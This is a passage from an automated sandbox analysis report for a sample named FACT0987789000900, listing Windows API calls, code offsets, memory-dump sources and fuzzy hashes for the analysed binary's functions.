                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                • String ID: Msctls_Progress32
                                                                                                                • API String ID: 1025951953-3636473452
                                                                                                                • Opcode ID: 893c660a5614ab8f2c4e964895a7b93d9e5427e15d5df936caf4dc4f69d4bbb3
                                                                                                                • Instruction ID: a34321c25d1dfeefdc8a16d3584f5c104cf7993fe7e96146e76f9e4d5d9190ae
                                                                                                                • Opcode Fuzzy Hash: 893c660a5614ab8f2c4e964895a7b93d9e5427e15d5df936caf4dc4f69d4bbb3
                                                                                                                • Instruction Fuzzy Hash: BC118EB155021DBEEF115F61CC85EEB7F6DFF09798F014115BA08A60A0C6769C22DBA8
                                                                                                                APIs
                                                                                                                • GetClientRect.USER32(?,?), ref: 004ACCF6
                                                                                                                • GetWindowRect.USER32(?,?), ref: 004ACD37
                                                                                                                • ScreenToClient.USER32(?,?), ref: 004ACD5F
                                                                                                                • GetClientRect.USER32(?,?), ref: 004ACE8C
                                                                                                                • GetWindowRect.USER32(?,?), ref: 004ACEA5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Client$Window$Screen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1296646539-0
                                                                                                                • Opcode ID: 067b5eef0d48ccb0e030115c17c3f079fdb6f2058e524ea642f4b0208f6d4133
                                                                                                                • Instruction ID: f996073b1ac1de4e141b21eca3fa091da18452d4727619863b6adeb6a950c2ae
                                                                                                                • Opcode Fuzzy Hash: 067b5eef0d48ccb0e030115c17c3f079fdb6f2058e524ea642f4b0208f6d4133
                                                                                                                • Instruction Fuzzy Hash: 20B19D79A00249DBDF50CFA8C5847EEBBB1FF18300F14852AEC59EB250DB34A951CB69
                                                                                                                APIs
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 004F1C18
                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 004F1C26
                                                                                                                • __wsplitpath.LIBCMT ref: 004F1C54
                                                                                                                  • Part of subcall function 004B1DFC: __wsplitpath_helper.LIBCMT ref: 004B1E3C
                                                                                                                • _wcscat.LIBCMT ref: 004F1C69
                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 004F1CDF
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 004F1CF1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                • String ID:
                                                                                                                • API String ID: 1380811348-0
                                                                                                                • Opcode ID: 744f98e4db79bbbb9e89c1c63d6903a4d2cc1fa29b517351812d2da2f05f03df
                                                                                                                • Instruction ID: 5543c6dedbe0613e4e246f47fc55882693c79df7f8b4bc65cbcf99869d03e9b9
                                                                                                                • Opcode Fuzzy Hash: 744f98e4db79bbbb9e89c1c63d6903a4d2cc1fa29b517351812d2da2f05f03df
                                                                                                                • Instruction Fuzzy Hash: A451A171504344AFD720EF65C885EABBBECEF88718F00492EF58597251EB74E904CBA6
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004F3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004F2BB5,?,?), ref: 004F3C1D
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004F30AF
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004F30EF
                                                                                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 004F3112
                                                                                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 004F313B
                                                                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 004F317E
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 004F318B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3451389628-0
                                                                                                                • Opcode ID: 43230025acef4cbb4fdf10b421b67b64efc39f315b389c1785cc36dc9f361606
                                                                                                                • Instruction ID: f28af2a7a9b3ae488df3046e998d9d22821d0dd0844b4e1d2272cdee72a39520
                                                                                                                • Opcode Fuzzy Hash: 43230025acef4cbb4fdf10b421b67b64efc39f315b389c1785cc36dc9f361606
                                                                                                                • Instruction Fuzzy Hash: FE516C31104304AFCB04EF65C995E6ABBF9FF88304F04492EF64587291DB35EA09CB56
                                                                                                                APIs
                                                                                                                • GetMenu.USER32(?), ref: 004F8540
                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 004F8577
                                                                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004F859F
                                                                                                                • GetMenuItemID.USER32(?,?), ref: 004F860E
                                                                                                                • GetSubMenu.USER32(?,?), ref: 004F861C
                                                                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 004F866D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Item$CountMessagePostString
                                                                                                                • String ID:
                                                                                                                • API String ID: 650687236-0
                                                                                                                • Opcode ID: 0a9c59e7929ddaaba680501ec25400e14b9212c80e465d8b63f435b385e64129
                                                                                                                • Instruction ID: e291586cc341d3121d1ff25e25d1149797ee6a024cadab6253dd557abd29c3b1
                                                                                                                • Opcode Fuzzy Hash: 0a9c59e7929ddaaba680501ec25400e14b9212c80e465d8b63f435b385e64129
                                                                                                                • Instruction Fuzzy Hash: C151C031A00218AFDF11EF65C945AEEBBF5EF58314F00406EE905BB351CB78AE418B98
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 004D4B10
                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004D4B5B
                                                                                                                • IsMenu.USER32(00000000), ref: 004D4B7B
                                                                                                                • CreatePopupMenu.USER32 ref: 004D4BAF
                                                                                                                • GetMenuItemCount.USER32(000000FF), ref: 004D4C0D
                                                                                                                • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 004D4C3E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3311875123-0
                                                                                                                • Opcode ID: 6f793efc3d3b075fac4905b95c2ea0fdc6770562783b3e1305f0fc36e5e1b51b
                                                                                                                • Instruction ID: 12792c1e78944372fb3eecc656e5cfdba57db4e3a3f621ea59a7a4c8eb4834cc
                                                                                                                • Opcode Fuzzy Hash: 6f793efc3d3b075fac4905b95c2ea0fdc6770562783b3e1305f0fc36e5e1b51b
                                                                                                                • Instruction Fuzzy Hash: BF51F370601209DFCF20CF68C898BAEBBF5AF94718F14811BE4159B390D779D944CB29
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004AB34E: GetWindowLongW.USER32(?,000000EB), ref: 004AB35F
                                                                                                                • BeginPaint.USER32(?,?,?), ref: 004AAC2A
                                                                                                                • GetWindowRect.USER32(?,?), ref: 004AAC8E
                                                                                                                • ScreenToClient.USER32(?,?), ref: 004AACAB
                                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 004AACBC
                                                                                                                • EndPaint.USER32(?,?,?,?,?), ref: 004AAD06
                                                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0050E673
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                                                • String ID:
                                                                                                                • API String ID: 2592858361-0
                                                                                                                • Opcode ID: 5660b525c2a2cd12a4602e99dc97196e934153899cb2468b5f2c21c92a8141e4
                                                                                                                • Instruction ID: 9f0fb56e2cd0b2996ae08a172769bb28d4f8f7bb65cf8281d91267510682c0df
                                                                                                                • Opcode Fuzzy Hash: 5660b525c2a2cd12a4602e99dc97196e934153899cb2468b5f2c21c92a8141e4
                                                                                                                • Instruction Fuzzy Hash: C341B170104300AFD710DF24DC84FBB7BB8EB6A325F14061AF9A5872A1C7359849EB66
                                                                                                                APIs
                                                                                                                • ShowWindow.USER32(00551628,00000000,00551628,00000000,00000000,00551628,?,0050DC5D,00000000,?,00000000,00000000,00000000,?,0050DAD1,00000004), ref: 004FE40B
                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 004FE42F
                                                                                                                • ShowWindow.USER32(00551628,00000000), ref: 004FE48F
                                                                                                                • ShowWindow.USER32(00000000,00000004), ref: 004FE4A1
                                                                                                                • EnableWindow.USER32(00000000,00000001), ref: 004FE4C5
                                                                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 004FE4E8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 642888154-0
                                                                                                                • Opcode ID: fe320fc4dfa20cf5ccb85f094aaf91fcbe6228eecf3c7fc801d3231991631fd5
                                                                                                                • Instruction ID: 09b45a1d68aeb14a4e2b85e5200cc5aa32db2bdf543da90749802b09a676c2bf
                                                                                                                • Opcode Fuzzy Hash: fe320fc4dfa20cf5ccb85f094aaf91fcbe6228eecf3c7fc801d3231991631fd5
                                                                                                                • Instruction Fuzzy Hash: 15417130601154EFDB21CF2AC499BA57BF1BF05305F1881AEEB588F2B2C735A845DB65
                                                                                                                APIs
                                                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 004D98D1
                                                                                                                  • Part of subcall function 004AF4EA: std::exception::exception.LIBCMT ref: 004AF51E
                                                                                                                  • Part of subcall function 004AF4EA: __CxxThrowException@8.LIBCMT ref: 004AF533
                                                                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 004D9908
                                                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 004D9924
                                                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 004D999E
                                                                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004D99B3
                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 004D99D2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                • String ID:
                                                                                                                • API String ID: 2537439066-0
                                                                                                                • Opcode ID: d16c6ebe2586d40d7afab4fc6e73229d21732c83c9b37833a57aa9429bf2c8b3
                                                                                                                • Instruction ID: 7bc3ce11991a2a5b3fbc6b55783976f3d2d5c43ec63a6b3f598deb931a7a7d70
                                                                                                                • Opcode Fuzzy Hash: d16c6ebe2586d40d7afab4fc6e73229d21732c83c9b37833a57aa9429bf2c8b3
                                                                                                                • Instruction Fuzzy Hash: 4F319E71900205ABDB00AFA5DC85AAFBBB8FF55314B1480AAF904EB246D734DE14DBA4
                                                                                                                APIs
                                                                                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,004E77F4,?,?,00000000,00000001), ref: 004E9B53
                                                                                                                  • Part of subcall function 004E6544: GetWindowRect.USER32(?,?), ref: 004E6557
                                                                                                                • GetDesktopWindow.USER32 ref: 004E9B7D
                                                                                                                • GetWindowRect.USER32(00000000), ref: 004E9B84
                                                                                                                • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 004E9BB6
                                                                                                                  • Part of subcall function 004D7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004D7AD0
                                                                                                                • GetCursorPos.USER32(?), ref: 004E9BE2
                                                                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 004E9C44
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 4137160315-0
                                                                                                                • Opcode ID: e8dba3ce7e4911af9752d5b501248a3a1a021ce6f1bf0fb8b24f84aa2a027579
                                                                                                                • Instruction ID: 703c41294a885b74825d585d3b4728b6697209abf6fa758419e432a4215f82fb
                                                                                                                • Opcode Fuzzy Hash: e8dba3ce7e4911af9752d5b501248a3a1a021ce6f1bf0fb8b24f84aa2a027579
                                                                                                                • Instruction Fuzzy Hash: 4631EF72104355AFC710DF15D849F9BB7E9FF88314F00091AF595D7281DA34EA08CBA6
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004AAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 004AAFE3
                                                                                                                  • Part of subcall function 004AAF83: SelectObject.GDI32(?,00000000), ref: 004AAFF2
                                                                                                                  • Part of subcall function 004AAF83: BeginPath.GDI32(?), ref: 004AB009
                                                                                                                  • Part of subcall function 004AAF83: SelectObject.GDI32(?,00000000), ref: 004AB033
                                                                                                                • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 004FEC20
                                                                                                                • LineTo.GDI32(00000000,00000003,?), ref: 004FEC34
                                                                                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 004FEC42
                                                                                                                • LineTo.GDI32(00000000,00000000,?), ref: 004FEC52
                                                                                                                • EndPath.GDI32(00000000), ref: 004FEC62
                                                                                                                • StrokePath.GDI32(00000000), ref: 004FEC72
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                • String ID:
                                                                                                                • API String ID: 43455801-0
                                                                                                                • Opcode ID: 0565c5884e80c2cd6f595dfbe2d624ac179b04d6f7b44861d422b5b5797e3a2b
                                                                                                                • Instruction ID: 000f8402d457b1374e7d7b9a7f5e684a7b73d8dfbd7dfc6dcf76112668ae382a
                                                                                                                • Opcode Fuzzy Hash: 0565c5884e80c2cd6f595dfbe2d624ac179b04d6f7b44861d422b5b5797e3a2b
                                                                                                                • Instruction Fuzzy Hash: A811057600014DBFEB029F90DC88EEA7F6DEB18355F048122BE088A160D7719E59EBA4
                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 004CE1C0
                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 004CE1D1
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004CE1D8
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 004CE1E0
                                                                                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 004CE1F7
                                                                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 004CE209
                                                                                                                  • Part of subcall function 004C9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,004C9A05,00000000,00000000,?,004C9DDB), ref: 004CA53A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 603618608-0
                                                                                                                • Opcode ID: 3fdfa1bb0a4850b7556797618e23b999b8d621f4ab9103ed27b735cf609be921
                                                                                                                • Instruction ID: 683d5ba45e211ee30fc22a60622e01681fc36e8eb9a6ee8882ec27f3d6f563b7
                                                                                                                • Opcode Fuzzy Hash: 3fdfa1bb0a4850b7556797618e23b999b8d621f4ab9103ed27b735cf609be921
                                                                                                                • Instruction Fuzzy Hash: C70188B5A40714BFEB105BA68C45F5EBF78EB58351F048066E904A7390DA719C00DF60
                                                                                                                APIs
                                                                                                                • __init_pointers.LIBCMT ref: 004B7B47
                                                                                                                  • Part of subcall function 004B123A: __initp_misc_winsig.LIBCMT ref: 004B125E
                                                                                                                  • Part of subcall function 004B123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004B7F51
                                                                                                                  • Part of subcall function 004B123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004B7F65
                                                                                                                  • Part of subcall function 004B123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004B7F78
                                                                                                                  • Part of subcall function 004B123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004B7F8B
                                                                                                                  • Part of subcall function 004B123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004B7F9E
                                                                                                                  • Part of subcall function 004B123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 004B7FB1
                                                                                                                  • Part of subcall function 004B123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 004B7FC4
                                                                                                                  • Part of subcall function 004B123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 004B7FD7
                                                                                                                  • Part of subcall function 004B123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 004B7FEA
                                                                                                                  • Part of subcall function 004B123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 004B7FFD
                                                                                                                  • Part of subcall function 004B123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 004B8010
                                                                                                                  • Part of subcall function 004B123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 004B8023
                                                                                                                  • Part of subcall function 004B123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004B8036
                                                                                                                  • Part of subcall function 004B123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004B8049
                                                                                                                  • Part of subcall function 004B123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004B805C
                                                                                                                  • Part of subcall function 004B123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 004B806F
                                                                                                                • __mtinitlocks.LIBCMT ref: 004B7B4C
